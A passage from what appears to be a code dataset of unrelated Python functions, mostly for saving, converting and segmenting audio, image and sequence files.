:, 3] = bigimage[:, :, 4]\n bi[:, :, 4] = bigimage[:, :, 3]\n bi[:, :, 5] = bigimage[:, :, 6]\n bi[:, :, 6] = bigimage[:, :, 5]\n bi[:, :, 7] = bigimage[:, :, 7]\n bi[:, :, 8] = bigimage[:, :, 8]\n elif eye == 'R':\n bi[:, :, 0] = bigimage[:, :, 2]\n bi[:, :, 1] = bigimage[:, :, 1]\n bi[:, :, 2] = bigimage[:, :, 0]\n bi[:, :, 3] = bigimage[:, :, 4]\n bi[:, :, 4] = bigimage[:, :, 3]\n bi[:, :, 5] = bigimage[:, :, 5]\n bi[:, :, 6] = bigimage[:, :, 6]\n bi[:, :, 7] = bigimage[:, :, 7]\n bi[:, :, 8] = bigimage[:, :, 8]\n bigimage = bi\n\n if err:\n print(\" ...didn't load sequence. There was an error.\")\n continue\n \n print(\" ...loaded one sequence:\", (fileprefix + str(asdfghjkl)))\n \n if 'sol388' not in self.archive:\n name = fileprefix + str(asdfghjkl) + '_' + unit + '_' + feature\n else:\n name = namestem + '_' + unit + '_' + feature\n\n \n (segments, segmentlabels) = self.segment_image(bigimage, unit=unit)\n segmentation[fileprefix + str(asdfghjkl)] = segments[0][1]\n\n for i in range(len(segments)):\n data += [[float(x) for x in self.process_image(segments[i], name + segmentlabels[i], feature=feature)]]\n \n asdfghjkl += 1\n \n ###########################################\n \n seen += 1\n \n # output read-in progress\n if percent < 100:\n if (round((seen / float(numfiles)) * 100, 1) >= percent) and (printed[int(percent * 10)] == False):\n #print(\"...%3.1f%%...\" % percent)\n printed[int(percent * 10)] == True\n percent = round(((seen / float(numfiles)) * 100), 1) + 1\n print(\"...100%...\")\n print(\"Transposing data...\")\n data = np.array(data).T\n self.xvals.sort()\n \n # Output the pickle\n print(\"Writing pickle to \" + self.archive + \" ...\")\n outf = open(self.archive, 'w')\n pickle.dump((data, fullimages, segmentation, self.labels, self.xlabel, self.ylabel, self.xvals, self.rgbdict, self.lblext, self.initdata, self.initfilename), outf)\n outf.close()\n print(\"Wrote pickle to \" + self.archive)", "def onefile(yr):\r\n\r\n global MF\r\n filename = \"{0}/yob{1:4d}.txt\".format(dirname, yr)\r\n f = open(filename, \"r\")\r\n for l in f:\r\n cols = l.strip().split(\",\")\r\n name = cols[0]\r\n gender = cols[1]\r\n cnt = float(cols[2])\r\n if not (name in MF[gender]):\r\n #print(MF)\r\n #print('this is after')\r\n MF[gender][name] = [0.0 for x in range(firstyr, lastyr)]\r\n #print(MF)\r\n #print(len(MF[gender][name]))\r\n MF[gender][name][yr-firstyr] = cnt\r\n #print(MF)\r\n f.close()", "def text_to_file(phase, filename):\n path = \"sons/%s\" % filename # caminho para arquivo\n\n # gera e salva frase pelo gTTS\n voice = gTTS(phase, lang='pt')\n voice.save(path)\n\n return path", "def start():\r\n\r\n total_files = sum([len(files) for r, d, files in os.walk(abs_source_directory)])\r\n total_files_down = total_files\r\n for i in range(total_files, 0, -1):\r\n if i % 10 == 0:\r\n total_files_down = i\r\n break\r\n current_iteration = 0\r\n last_factor = 0\r\n position = 1\r\n print(\"[{0}] {1}/{2}\".format(\" \" * 10, 0, total_files))\r\n for path, dirs, files in os.walk(abs_source_directory):\r\n for file_name in list(filter(lambda x: x.endswith(\".pdf\"), files)):\r\n file_source_path = os.path.join(path, file_name)\r\n out = re.search(normal_regex, file_source_path)\r\n # Handles normal past-papers\r\n try:\r\n found_groups = out.groups()\r\n write_copy(file_source_path, file_name, matched_groups=found_groups)\r\n except AttributeError:\r\n # Handles music past-papers\r\n if \"Music_\" in file_source_path:\r\n out = re.search(audio_music_regex, file_source_path)\r\n try:\r\n found_groups = out.groups()\r\n write_copy(file_source_path, file_name, music_groups=found_groups)\r\n except AttributeError:\r\n print(f\"CRITICAL ERROR: File not handled: {file_source_path}\")\r\n elif \"Exam Pack list of omitted papers and markschemes\" in file_name:\r\n pass\r\n else:\r\n print(f\"CRITICAL ERROR: File not handled: {file_source_path}\")\r\n current_iteration += 1\r\n if current_iteration == last_factor + total_files_down / 10:\r\n last_factor = current_iteration\r\n print(\"[{0}{1}] {2}/{3}\".format(\"-\" * position, \" \" * (10 - position), current_iteration, total_files))\r\n position += 1\r\n # Handles mp3 files\r\n for file_name in list(filter(lambda x: x.endswith(\".mp3\"), files)):\r\n file_source_path = os.path.join(path, file_name)\r\n out = re.search(audio_music_regex, file_source_path)\r\n try:\r\n found_groups = out.groups()\r\n write_copy(file_source_path, file_name, audio_groups=found_groups)\r\n except AttributeError:\r\n print(f\"CRITICAL ERROR: File not handled: {file_source_path}\")\r\n current_iteration += 1\r\n if current_iteration == last_factor + total_files_down / 10:\r\n last_factor = current_iteration\r\n print(\"[{0}{1}] {2}/{3}\".format(\"-\" * position, \" \" * (10 - position), current_iteration, total_files))\r\n position += 1\r\n print(\"[{0}] {1}/{2}\".format(\"-\" * 10, total_files, total_files))", "def save_chunks(chunk_sound, out_path, video_id):\n chunk_start_ms = int(chunk_sound.get_start_time()*1000)\n chunk_end_ms = int(chunk_sound.get_end_time()*1000)\n chunk_duration = chunk_end_ms - chunk_start_ms\n\n chunk_fn = '{0}_{1}_{2}.wav'.format(video_id, chunk_start_ms, chunk_end_ms)\n chunk_file_path = path.join(out_path, chunk_fn)\n chunk_sound.save(chunk_file_path, 'WAV')\n\n return {'filename': chunk_fn, 'video_id': video_id, 'start_time': chunk_start_ms, 'end_time': chunk_end_ms, 'duration': chunk_duration}", "def write(self, filename):\n assert filename[-3:]=='.fz','name must end in .fz'\n\n files.makedir_fromfile(filename)\n\n ucfilename=filename[0:-3]\n bname = os.path.basename(ucfilename)\n\n tmp_path = os.path.join(\n files.get_temp_dir(),\n bname,\n )\n files.makedir_fromfile(tmp_path)\n\n with TempFile(tmp_path) as tfile:\n super(CosmosMEDSMaker,self).write(tfile.path)\n self._compress_meds_file(tfile.path, filename)", "def read_word(label_paths, save_path=None):\n print('===> Reading word segmentation...')\n p, i = ProgressBar(max_value=len(label_paths)), 0\n speaker_dict = {}\n word_set, char_set = set([]), set([])\n for label_path in p(label_paths):\n utterance_dict = {}\n with open(label_path, 'r') as f:\n for line in f:\n line = line.strip().split(' ')\n speaker_name = line[0].split('-')[0]\n utt_index = line[0].split('-')[-1]\n start_time = float(line[1])\n end_time = float(line[2])\n # convert to lowercase\n word_original = ' '.join(line[3:]).lower()\n\n # clean transcript\n transcript = fix_transcript(word_original, speaker_name)\n\n # skip silence\n if transcript == '':\n continue\n\n # remove head & last space\n # if transcript[0] == ' ':\n # transcript = transcript[1:]\n # if transcript[-1] == ' ':\n # transcript = transcript[:-1]\n\n # convert from character to phone\n # phone_list = ['SIL']\n # keys = pronounce_dict.keys()\n # for word in transcript.split(' '):\n # if word in keys:\n # phone_list.append(pronounce_dict[word])\n # phone_list.append('SIL')\n # else:\n # print(transcript.split(' '))\n\n # convert to phone list where each element is phone (remove ' ')\n # phone_seq = ' '.join(phone_list)\n # phone_list = phone_seq.split(' ')\n\n for char in list(word):\n if char == '':\n print(list(word))\n char_set.add(char)\n\n # utterance_dict[utt_index] = [start_time, end_time, phone_list]\n # speaker_dict[speaker_name] = utterance_dict\n\n p.update(i + 1)\n i += 1\n time.sleep(0.01)\n\n char_set = sorted(list(char_set))\n print(len(char_set))\n\n # make mapping file (from phone to number)\n # if not os.path.isfile(os.path.abspath('../phone2num.txt')):\n # with open(os.path.abspath('../phone2num.txt'), 'w') as f:\n # index = 0\n # for phone in phones:\n # f.write('%s %s\\n' % (phone, str(index)))\n # index += 1\n #\n # if save_path is not None:\n # print('Saving target labels...')\n # for speaker_name, utterance_dict in p_save(speaker_dict.items()):\n # save_path_speaker = mkdir(os.path.join(save_path, speaker_name))\n # for utt_index, utt_info in utterance_dict.items():\n # start_time, end_time, phone_list = utt_info\n # save_file_name = speaker_name + '_' + utt_index + '.npy'\n #\n # # convert from phone to number\n # phone_index_list = phone2num(phone_list)\n #\n # # save as npy file\n # np.save(os.path.join(save_path_speaker, save_file_name), phone_index_list)\n #\n #\n\n return speaker_dict", "def write_wav(fname, samps, sampling_rate=16000, normalize=True):\n\t# for multi-channel, accept ndarray [Nsamples, Nchannels]\n\tif samps.ndim != 1 and samps.shape[0] < samps.shape[1]:\n\t\tsamps = np.transpose(samps)\n\t\tsamps = np.squeeze(samps)\n\t# same as MATLAB and kaldi\n\tif normalize:\n\t\tsamps = samps * MAX_INT16\n\t\tsamps = samps.astype(np.int16)\n\tfdir = os.path.dirname(fname)\n\tif fdir and not os.path.exists(fdir):\n\t\tos.makedirs(fdir)\n\t# NOTE: librosa 0.6.0 seems could not write non-float narray\n\t# so use scipy.io.wavfile instead\n\twavfile.write(fname, sampling_rate, samps)", "def tonify(self, tone_generator=None, verbose=False):\n if tone_generator is None:\n tone_generator = ToneGenerator('tonifyoutput.wav')\n tone_generator.file.setnchannels(len(self.sheets))\n # Find the max length (in seconds) of the data sheets\n max_length = 0.0\n for sheet in self.sheets:\n if len(sheet) > max_length:\n max_length = len(sheet)\n nframes = int(max_length * tone_generator.sample_rate)\n tone_generator.file.setnframes(nframes)\n\n tone_strs = []\n for d in self.sheets:\n if verbose:\n print \"File:\", d.data.name\n print \"Frequencies:\", self.freqs[self.sheets.index(d)]\n values = []\n tone_generator.setfreqs(self.freqs[self.sheets.index(d)])\n for i in range(0, len(d.times)):\n duration = d.durations[i]\n calls = d.calls[i]\n if verbose:\n print \"\\ttone: (%d, %d, %d) for %f seconds\" % (calls[0], calls[1],\n calls[2], duration)\n tone = tone_generator.get_tone((calls[0], calls[1], calls[2]), duration)\n values.append(str(tone))\n try:\n delta = float((d.times[i + 1] - d.times[i]).seconds)\n if float(delta) - duration < 0.0:\n silence_duration = 0.0\n else:\n silence_duration = float(delta) - duration\n except IndexError:\n break\n if verbose:\n print \"\\tsilence for\", silence_duration,\"seconds\"\n silence = tone_generator.get_silence(silence_duration)\n values.append(str(silence))\n if len(d) < max_length:\n end_silence = tone_generator.get_silence(max_length - len(d))\n values.append(str(end_silence))\n value_str = ''.join(values)\n tone_strs.append(value_str)\n \n if verbose:\n print \"Writing to file... (may take several minutes)\"\n combined = interleave_binarystr(tone_strs)\n tone_generator.file.writeframes(combined)\n if verbose:\n print \"Finished writing.\"\n tone_generator.close()", "def transcribe_audio_file(filename):\n url = 'https://api.nexiwave.com/SpeechIndexing/file/storage/' + USERNAME +'/recording/?authData.passwd=' + PASSWORD + '&auto-redirect=true&response=application/json'\n\n # To receive transcript in plain text, instead of html format, comment this line out (for SMS, for example)\n #url = url + '&transcriptFormat=html'\n\n\n # Ready to send:\n sys.stderr.write(\"Send audio for transcript with \" + url + \"\\n\")\n r = requests.post(url, files={'mediaFileData': open(filename,'rb')})\n data = r.json()\n transcript = data['text']\n foo = data['text']\n f = open('newf.txt', 'w')\n f.write(foo)\n f.close() \n # Perform your magic here:\n print \"Transcript for \"+filename+\"=\" + transcript", "def verb(filename,l,t,d,wout=True): #l = predelay d= decay smaller = less decay, t= number of delays\n#low l turns into chorus\n start=time.time()\n n, data, data_dB,sr,ch=inputwav(filename)\n data_ex=np.zeros(((n+l*t),ch))\n data_ex[0:n,:]=data\n data_Rex=np.zeros((len(data_ex),t,ch))\n print('Applying reverb...')\n for k in range (ch):\n for i in range (len(data)):\n for j in range(t):\n data_Rex[i+l*(j+1),j,k]=data_ex[i,k]*np.exp(-d*(j+1))\n data_F=data_ex\n print('Mixing...')\n for i in range (t):\n data_F=data_F+1*data_Rex[:,i,:]\n data_F=1*data_F\n data_verb=data_F+data_ex\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_verbed.wav',data_verb,sr,'PCM_16')\n print('Done!')\n end=time.time()\n elapsed=int(1000*(end-start))\n print('...............................')\n print('Completed in '+str(elapsed)+' milliseconds.')\n return data_verb", "def dir_resolution(self, src_path, frag_length=128):\n src_path = os.path.join(self.root_path, src_path)\n files = os.listdir(src_path)\n\n MFCCs = None\n labels = None\n cnt = 1\n total_num = len(files)\n for wav in files:\n wav_path = os.path.join(src_path, wav)\n MFCCs_each, labels_each = self.features_and_labels(wav_path, frag_length)\n if MFCCs is not None:\n MFCCs = torch.cat((MFCCs, MFCCs_each))\n labels = torch.cat((labels, labels_each))\n else:\n MFCCs, labels = MFCCs_each, labels_each\n\n if cnt % 1000 == 0:\n print('{} data pieces have been loaded in and {} are left'.format(cnt, total_num-cnt))\n cnt += 1\n\n np.save(self.feature_file, MFCCs.numpy()) \n np.save(self.label_file, labels.numpy())\n print('Loading into files finished!')", "def RecordFile(self, duration, num_channels, file_path):\n session.console.info('RecordFile : %s.', file_path)\n with file_utils.UnopenedTemporaryFile() as record_path, \\\n self._dut.temp.TempFile() as dut_record_path:\n self._dut.audio.RecordRawFile(dut_record_path, self._in_card,\n self._in_device, duration, num_channels,\n 48000)\n self._dut.link.Pull(dut_record_path, record_path)\n audio_utils.TrimAudioFile(in_path=record_path, out_path=file_path,\n start=_DEFAULT_TRIM_SECONDS, end=None,\n num_channels=num_channels)", "def __newSampleFile(self):\n self.__newFileName()\n self.__sampleFile = wav.open(self.__fileName, self.OPEN_MODE)\n self.__sampleFile.setnchannels(NUM_CHANNELS)\n self.__sampleFile.setsampwidth(self.__audio.get_sample_size(self.FORMAT))\n self.__sampleFile.setframerate(FS)", "def map_audio(self): \n for root, dirs, files in os.walk(self.dir):\n for name in files:\n if (name.split(\".\")[-1].lower() == 'm4a' or \\\n name.split(\".\")[-1].lower() == 'mp3'):\n \n cur_path = \"{0}/{1}\".format(root, name)\n cur_file = auto.File(cur_path)\n \n artist = cur_file.artist.lower().strip()\n album = cur_file.album.lower().strip()\n title = cur_file.title.lower().strip()\n bitrate = cur_file.bitrate\n \n if not artist in self.audio_dict:\n self.audio_dict[artist] = {}\n \n if not album in self.audio_dict[artist]:\n self.audio_dict[artist][album] = {}\n \n title_key = title\n for in_album_title in self.audio_dict[artist][album]:\n if sm(None, title, in_album_title).ratio() > 0.9:\n title_key = in_album_title\n \n if not title_key in \\\n self.audio_dict[artist][album]:\n self.audio_dict[artist][album][title_key] = []\n \n self.audio_dict[artist][album][title_key].append({\n 'path': cur_path,\n 'bitrate': bitrate,\n 'file_name': name\n })\n \n return self", "def writeFastaFile(filename,sequences):\n fhw=open(filename,\"w\")\n for id in sequences:\n fhw.write(\">\"+id+\"\\n\"+sequences[id]+\"\\n\")\n fhw.close()", "def save_audio(ndarray, feature_name, out_path, x, y, new_labels, filename=None, sr=SR):\n # this is kind-of standard\n filename = filename or FeatureExtractor.get_file_name(x, feature_name, 'wav')\n librosa.output.write_wav(out_path / filename, ndarray, sr=sr, norm=True)\n new_labels.append([filename, y])\n print('info: {} transformed and saved!'.format(filename))\n return filename", "def split_into_yaps(audio_seg, user_id, duration_slice=900000.0):\n l_audio_paths = []\n duration = len(audio_seg)\n rest = duration % duration_slice\n slice_number = duration // duration_slice - 1\n i = 0\n def get_interval(sub_audio, start, end):\n sub_audio = sub_audio[:end]\n if start != end:\n sub_audio = sub_audio[-start:]\n return sub_audio\n while slice_number >= i:\n d_info = {}\n new_file = get_interval(audio_seg, duration_slice, (i + 1) * duration_slice)\n to_upload = new_file.export()\n d_info['length'] = len(new_file)\n d_info['path'] = upload_file_to_s3(to_upload, user_id, \"yap_audio\", str(i))\n l_audio_paths.append(d_info)\n i += 1\n if rest:\n d_info = {}\n new_file = audio_seg[-rest:]\n to_upload = new_file.export()\n d_info['length'] = len(new_file)\n d_info['path'] = upload_file_to_s3(to_upload, user_id, \"yap_audio\", str(i))\n l_audio_paths.append(d_info)\n return l_audio_paths", "def store(self, filename):", "def enregistre_audio(\n audio: AudioSegment, \n chemin:str = 'animalese.wav',\n format:str ='wav'\n ) -> AudioSegment:\n\n which = pydub.utils.which\n\n if which(\"avconv\"):\n app = \"avconv\"\n elif which(\"ffmpeg\"):\n app = \"ffmpeg\"\n elif format not in {'raw', 'wav'}:\n raise FileNotFoundError(\"ffmpeg/avconv introuvable.\") \n\n return audio.export(chemin, format=format)", "def features_from_folder(label_folder, audio_folder, output_folder):\n print('Listing label files from folder.')\n #scan labels folder\n labels_list = os.listdir(label_folder)\n label_files = []\n for filename in labels_list:\n #get its extension\n file_extension = filename.split('.')[-1]\n if file_extension != 'txt':\n continue\n #save to without its extension\n label_files.append(filename[:-4])\n\n print('Listing audio files from folder.')\n #scan audio folder\n audios_list = os.listdir(audio_folder)\n audio_files = []\n for filename in audios_list:\n #get its extension\n file_extension = filename.split('.')[-1]\n if file_extension != 'wav':\n continue\n #save to without its extension\n audio_files.append(filename[:-4])\n\n print('Removing files without matches')\n #use only the files with matching audio/label\n files_to_process = []\n for label_file in label_files:\n if label_file in audio_files:\n files_to_process.append(label_file)\n\n print('Processing each file...')\n i = 1\n class_count = {}\n total_f = len(files_to_process)\n #for each file\n for processing in files_to_process:\n print('File', str(i) + '/' + str(total_f))\n i += 1\n\n #\n label_file = os.path.join(label_folder, processing + \".txt\")\n audio_file = os.path.join(audio_folder, processing + \".wav\")\n\n #get the segments from the corresponding label file\n segments = get_segments(label_file)\n\n #\n total_s = len(segments)\n j = 1\n #for each segment\n for segment in segments:\n print('\\tSegment', str(j) + '/' + str(total_s), segment['class'])\n j += 1\n\n if class_count.get(segment['class']) is None:\n class_count[segment['class']] = 1\n else:\n class_count[segment['class']] += 1\n output_filename = segment['class']\n output_filename += '-' + format(class_count[segment['class']], '04d')\n output_filename = os.path.join(output_folder, output_filename)\n\n #get its features\n segment_features = features_from_label(audio_file, segment)\n\n #save it to a file\n fe.write_as_bin(output_filename, segment_features)", "def save_lod_files(files, filename, path=None, start_index=0):\n path = path_formatter(path)\n for i, target in enumerate(files):\n with open(\"{}{}_{}.mtxt\".format(path, filename, i + start_index),\n \"w\") as f:\n f.write(str(target))", "def save_to_file(filename: str, sequence: List[Sample]):\n\n with open(get_path() + \"/sequence/\" + filename, \"ab+\") as file:\n for sample in sequence:\n pickle.dump(sample, file, pickle.HIGHEST_PROTOCOL)", "def encode_and_save_files(\n subtokenizer, data_dir, raw_files, tag, total_shards):\n # Create a file for each shard.\n filepaths = [shard_filename(data_dir, tag, n + 1, total_shards)\n for n in range(total_shards)]\n\n if all_exist(filepaths):\n logging.info(\"Files with tag %s already exist.\" % tag)\n return filepaths\n\n logging.info(\"Saving files with tag %s.\" % tag)\n input_file = raw_files[0]\n target_file = raw_files[1]\n\n # Write examples to each shard in round robin order.\n tmp_filepaths = [six.ensure_str(fname) + \".incomplete\" for fname in filepaths]\n writers = [tf.python_io.TFRecordWriter(fname) for fname in tmp_filepaths]\n counter, shard = 0, 0\n for counter, (input_line, target_line) in enumerate(zip(\n txt_line_iterator(input_file), txt_line_iterator(target_file))):\n if counter > 0 and counter % 100000 == 0:\n logging.info(\"\\tSaving case %d.\" % counter)\n \n ids = subtokenizer.encode(input_line, add_eos=True)\n inputs, targets = drop_sequence(subtokenizer, ids)\n example = dict_to_example({\"inputs\": inputs, \"targets\": targets})\n\n writers[shard].write(example.SerializeToString())\n shard = (shard + 1) % total_shards\n for writer in writers:\n writer.close()\n\n for tmp_name, final_name in zip(tmp_filepaths, filepaths):\n tf.gfile.Rename(tmp_name, final_name)\n\n logging.info(\"Saved %d Examples\", counter + 1)\n return filepaths", "def manage_ident(filebasename, gmm, clusters):\n seg_f = open(\"%s.ident.%s.seg\" % (filebasename, gmm), \"r\")\n for line in seg_f:\n if line.startswith(\";;\"):\n# print line\n splitted_line = line.split()[1].split(':')[1].split('_')\n# print splitted_line\n try:\n cluster, speaker = splitted_line\n except:\n speaker = splitted_line[0]\n idx = line.index('score:' + speaker) + len('score:' + speaker + \" = \")\n iidx = line.index(']', idx) - 1\n value = line[idx:iidx]\n if not cluster in clusters:\n clusters[cluster] = Cluster(cluster, 'U', '0', '', cluster)\n clusters[cluster].add_speaker(speaker, value)\n seg_f.close()\n if not CONFIGURATION.KEEP_INTERMEDIATE_FILES:\n os.remove(\"%s.ident.%s.seg\" % (filebasename, gmm))", "def generate_segments(full_filename, summary=False):\n\n\t# split filename and create folder to store segments\n\tfilename, filetype = os.path.splitext(full_filename)\n\tfolder, filename = os.path.split(filename)\n\tif len(folder) > 0:\n\t\tfolder = folder+\"/\"\n\tif not os.path.isfile(folder+filename+filetype):\n\t\tprint(\"ERROR: File\", folder+filename+filetype, \"does not exist.\")\n\t\tsys.exit()\n\tif not os.path.exists(folder+\"segments\"):\n\t\tos.makedirs(folder+\"segments\")\n\n\t# set flags\n\tlast_new_segment = 0\t# frame at which segment began\n\twas_low = False\t\t\t# if hand left image since segment began\n\tlow_count = 0\t\t\t# consecutive frames for which hand was gone\n\tsegment = 0\t\t\t\t# segment id number\n\n\t# initialize summary/segment writers, set background as first frame\n\treader = imageio.get_reader(folder+filename+filetype, 'ffmpeg')\n\tfps = reader.get_meta_data()['fps']\n\tnframes = reader.get_meta_data()['nframes']\n\tsegment_writer = imageio.get_writer(\n\t\t\tfolder+\"segments/\"+filename+str(segment)+filetype, \n\t\t\t'ffmpeg', fps=fps, macro_block_size=None)\n\tsegment_writer.close()\n\tif summary:\n\t\tsummary_writer = imageio.get_writer(folder+filename+\"_summary\"+filetype, \n\t\t\t'ffmpeg', fps=fps*2)\n\tbackground = np.array(reader.get_data(0)).astype(int)[:,:,0]\n\n\t# process video and segment\n\tfor i, image in enumerate(reader):\n\n\t\t# background subtract, threshold at zero\n\t\timage = np.array(image).astype(int)[:,:,0]\n\t\timage = np.maximum(image - background, np.zeros(image.shape))\n\n\t\t# check if at least 3 edge pixels belong to a hand\n\t\tif (np.sum(image[Y1:Y1+1, X0:X1] > HAND_CUTOFF) > 3 or \n\t\t\t\tnp.sum(image[Y0:Y0+1, X0:X1] > HAND_CUTOFF) > 3 or\n\t\t\t\tnp.sum(image[Y0:Y1, X0:X0+1] > HAND_CUTOFF) > 3 or\n\t\t\t\tnp.sum(image[Y0:Y1, X1:X1+1] > HAND_CUTOFF) > 3):\n\n\t\t\t# if hand just entered image and segment was long enough, start new segment\n\t\t\tif(i - last_new_segment > MIN_SEGMENT_LENGTH and was_low):\n\t\t\t\tif not segment_writer.closed:\n\t\t\t\t\tsegment_writer.close()\n\t\t\t\tsegment += 1\n\t\t\t\tsegment_writer = imageio.get_writer(\n\t\t\t\t\t\tfolder+\"segments/\"+filename+str(segment)+filetype, \n\t\t\t\t\t\t'ffmpeg', fps=fps, macro_block_size=None)\n\t\t\t\tlast_new_segment = i\n\t\t\t\twas_low = False\n\t\t\t\tlow_count = 0\n\n\t\telse: # hand isn't in image, after 1/10 second decide it has left\n\t\t\tlow_count += 1\n\t\t\tif low_count >= 3:\n\t\t\t\twas_low = True\n\t\t\t\n\t\t# segment has reached maximum length, end it\n\t\tif i - last_new_segment > MAX_SEGMENT_LENGTH:\n\t\t\tif not segment_writer.closed:\n\t\t\t\tsegment_writer.close()\n\n\t\t# add border for summary video around bounding area which is captured \n\t\timage[Y0-1,X0:X1] = WHITE*np.ones(X1-X0)\n\t\timage[Y1,X0:X1] = WHITE*np.ones(X1-X0)\n\t\timage[Y0:Y1,X0-1] = WHITE*np.ones(Y1-Y0)\n\t\timage[Y0:Y1,X1] = WHITE*np.ones(Y1-Y0)\n\n\t\t# record with segment/summary writers\n\t\tif not segment_writer.closed:\n\t\t\tsegment_writer.append_data(image[Y0:Y1,X0:X1].astype('uint8'))\n\t\t\tif summary:\n\t\t\t\tsummary_writer.append_data(image.astype('uint8'))\n\n\t\telse: # add lines to indicate not recording, add to summary writer\n\t\t\tfor x in range(X0, X1, 10):\n\t\t\t\timage[Y0:Y1,x] = WHITE*np.ones(Y1-Y0)\n\t\t\tif summary:\n\t\t\t\tsummary_writer.append_data(image.astype('uint8'))\n\n\t\t# display progress processing video\n\t\tif i % 100 == 0:\n\t\t\tpercent = (i / nframes)\n\t\t\tbars = percent*40\n\t\t\tsys.stdout.write(\"\\rSegmenting {0}: [{1}{2}] {3}% \".format(\n\t\t\t\tfull_filename, \"|\"*int(bars), \" \"*int(40-bars), int(percent*100)))\n\t\t\tsys.stdout.flush()\n\n\t# close writers\n\tprint(\"\")\n\tsegment_writer.close()\n\tif summary:\n\t\tsummary_writer.close()", "def convert_files_sequential(self) -> None:\n for file in os.listdir(self.audios_dir):\n if file.endswith(self.input_format):\n self.convert_file(os.path.join(\n self.audios_dir, file), self.output_format)", "def divide_fasta_like_file(input_file, output_dir, ext=''):\n with open(input_file, 'r') as file:\n body = ''\n p_id = ''\n for line in file:\n if line[0] == '>':\n if len(p_id) > 0:\n with open(output_dir + p_id.replace(':', '_') + '.' + ext, \"w\") as out_file:\n out_file.write('>' + p_id.replace(':', '_') + '\\n' + body + '\\n')\n body = ''\n p_id = line.strip()[1:]\n else:\n body += line.strip()\n with open(output_dir + p_id.replace(':', '_') + '.' + ext, \"w\") as out_file:\n out_file.write('>' + p_id.replace(':', '_') + '\\n' + body + '\\n')", "def transform_audio(self, segment: Union[AudioSegment, SpeechSegment]) -> None:\n gain = self._rng.uniform(self._min_gain_dBFS, self._max_gain_dBFS)\n segment.gain_db(gain)", "def divide_fasta_file(input_file, output_dir, ext='', is_fasta=True):\n if not is_fasta:\n divide_fasta_like_file(input_file, output_dir, ext)\n return\n\n with open(input_file, 'r'):\n for seq_record in SeqIO.parse(input_file, \"fasta\"):\n with open(output_dir + str(seq_record.id).replace(':', '_') + '.' + ext, \"w\") as out_file:\n out_file.write('>' + str(seq_record.id) + '\\n' + str(seq_record.seq) + '\\n')", "def save_data(self, f): \n if not self.sampling:\n self.convert_to_array()\n np.save(f, self.reads)", "def snip(filename,s,e,wout=True):\n n, data, data_dB,sr,ch=inputwav(filename)\n st=int(s*44100)\n en=int(e*44100)\n data_s=data[st:en,:]\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_snipped.wav',data_s,sr,'PCM_16')\n print('Done!')\n return data_s", "def load_signal(DS, sampling ):\n my_db = ppg_db()\n\n file_records = list()\n\n # get all file in the Normal directory\n folder_name = 'Normal/'\n list_file = os.listdir(pathDB + folder_name)\n list_file.sort()\n\n for file in list_file:\n # check just file name\n if file[0:4] in DS:\n file_records.append(file)\n\n # get all file in the AF directory\n folder_name = 'AF/'\n list_file = os.listdir(pathDB + folder_name)\n list_file.sort()\n\n for file in list_file:\n #print(file[0:5])\n if file[0:5] in DS:\n file_records.append(file)\n\n # inialize variable\n class_ID = [[] for i in range(len(DS))]\n beat = [[] for i in range(len(DS))]\n valid_R = [ np.array([]) for i in range(len(DS))]\n\n for myFile in range(0, len(file_records)):\n print(\"Processing signal... \" + str(myFile) + \" / \" + str(len(file_records)) + \"...\")\n\n\n # check is each file is named with Normal or AF\n # print(file_records[myFile][0]) => N or A\n if (file_records[myFile][0] == 'N'):\n filename = pathDB + 'Normal/' + file_records[myFile]\n print(\"file name \" + str(filename))\n f = open(filename, 'rb')\n reader = csv.reader(f, delimiter=',')\n\n RAW_signal_N = []\n for row in reader:\n # save signal to list\n RAW_signal_N.append(float(row[0]))\n\n # iterate in signal\n selectedSignal = []\n for i in range(0,len(RAW_signal_N)):\n selectedSignal.append(RAW_signal_N[i])\n # sampling every 180 unit\n if( i % (sampling-1) == 0 and i > 0 ):\n beat[myFile].append(selectedSignal)\n class_ID[myFile].append(0) # label the beat for Normal\n selectedSignal = []\n\n\n elif(file_records[myFile][0] == 'A'):\n filename = pathDB + 'AF/' + file_records[myFile]\n print(filename)\n f = open(filename, 'rb')\n reader = csv.reader(f, delimiter=',')\n\n RAW_signal_AF = []\n for row in reader:\n # save signal to list\n RAW_signal_AF.append(float(row[0]))\n\n # iterate in signal\n selectedSignal = []\n for i in range(0, len(RAW_signal_AF)):\n selectedSignal.append(RAW_signal_AF[i])\n # sampling every 180 unit\n if (i % (sampling - 1) == 0 and i > 0):\n beat[myFile].append(selectedSignal)\n class_ID[myFile].append(1) # label the beat for AF\n selectedSignal = []\n\n print(\"Complete Load File\")\n my_db.filename = file_records\n my_db.beat = beat\n my_db.class_ID = class_ID\n\n return my_db", "def save_to_file(self, filename: str):\n prepare = asdict(self)\n for sequencer in prepare['Sequencers']:\n for step in sequencer['Sequence']:\n if 'Name' in step.keys() and step['Name'] == '':\n step.pop('Name')\n if 'StartingFrom' in step.keys():\n step['Repeat'] = {}\n step['Repeat']['StartingFrom'] = step['StartingFrom']\n step['Repeat']['Count'] = step['Count']\n step.pop('StartingFrom')\n step.pop('Count')\n pprint.sorted = lambda x, key=None: x\n text: str = pprint.pformat(prepare, indent=0)\n text = text.replace(r\"'\", \"\")\n text = text[1:-1]\n f = open(filename, \"w\", encoding='utf-8')\n f.write(text)", "def save_segmentation_samples(self, dest=\"./Datasets/BillboardSegmentation.seg\", song_indices=[0, 10, 20, 30, 40, 50, 60, 70], n_frames=500):\n data = []\n chords = []\n gold_targets = []\n # Iterate over all song indices on the input\n for song_ind in song_indices:\n\n # Convert data and chord targets to sequences\n data_in_seqs, targets_in_seqs = Dataset.songs_to_sequences(\n FEATURESs=[self.DATA[song_ind].CHROMA],\n CHORDs=[self.CHORDS[song_ind]],\n TIME_BINSs=[self.DATA[song_ind].TIME_BINS],\n KEYs=self.DESC[song_ind].TONIC,\n n_frames=n_frames,\n norm_to_C=False\n )\n\n # Add song's sequences to lists as a new element\n data.append(data_in_seqs)\n chords.append(targets_in_seqs)\n gold_targets.append(SegmentationCRNN.labels2changes(targets = chords[-1]))\n\n # Save all three np arrays generated in this function .. data, chords, gold_targets aka chord changes\n with lzma.open(dest, \"wb\") as dataset_file:\n pickle.dump((data, chords, gold_targets), dataset_file)\n\n print(\"[INFO] The Billboard segmentation samples was saved successfully.\")", "def noisy_data(filename, split='train', clf='gender'):\n\n filepath = 'data/{}/{}/{}o.wav'.format(clf, split, filename)\n audio, sr = librosa.load(filepath, sr=16000)\n \n # Add noise\n noisy = add_noise(audio)\n 